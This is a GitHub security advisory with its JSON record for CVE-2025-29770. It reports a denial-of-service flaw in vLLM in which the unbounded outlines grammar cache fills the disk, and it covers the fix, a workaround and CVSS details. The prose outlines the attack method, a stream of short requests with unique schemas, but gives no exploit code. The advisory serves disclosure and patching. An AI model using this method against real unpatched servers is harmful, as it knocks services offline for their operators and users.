ghsa-mgrm-fgjv-mhv8
Vulnerability from github
Published
2025-03-19 15:52
Modified
2025-03-20 18:55
Summary
vLLM denial of service via outlines unbounded cache on disk
Details

Impact

The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server.

The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. vLLM should have this off by default and allow administrators to opt-in due to the potential for abuse.

A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space.

Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request.

This issue applies to the V0 engine only. The V1 engine is not affected.

Patches

  • https://github.com/vllm-project/vllm/pull/14837

The fix is to disable this cache by default since it does not provide an option to limit its size. If you want to use this cache anyway, you may set the VLLM_V0_USE_OUTLINES_CACHE environment variable to 1.

Workarounds

There is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.

References

Show details on source website


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "vllm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-29770"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-19T15:52:26Z",
    "nvd_published_at": "2025-03-19T16:15:31Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\nThe [outlines](https://dottxt-ai.github.io/outlines/latest/) library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server.\n\nThe affected code in vLLM is [vllm/model_executor/guided_decoding/outlines_logits_processors.py](https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py), which unconditionally uses the cache from outlines. vLLM should have this off by default and allow administrators to opt-in due to the potential for abuse.\n\nA malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space.\n\nNote that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the `guided_decoding_backend` key of the `extra_body` field of the request.\n\nThis issue applies to the V0 engine only. The V1 engine is not affected.\n\n### Patches\n\n* https://github.com/vllm-project/vllm/pull/14837\n\nThe fix is to disable this cache by default since it does not provide an option to limit its size. If you want to use this cache anyway, you may set the `VLLM_V0_USE_OUTLINES_CACHE` environment variable to `1`.\n\n### Workarounds\n\nThere is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.\n\n### References",
  "id": "GHSA-mgrm-fgjv-mhv8",
  "modified": "2025-03-20T18:55:45Z",
  "published": "2025-03-19T15:52:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-mgrm-fgjv-mhv8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29770"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/pull/14837"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vllm-project/vllm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vLLM denial of service via outlines unbounded cache on disk"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading...

Loading...

Loading...
  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.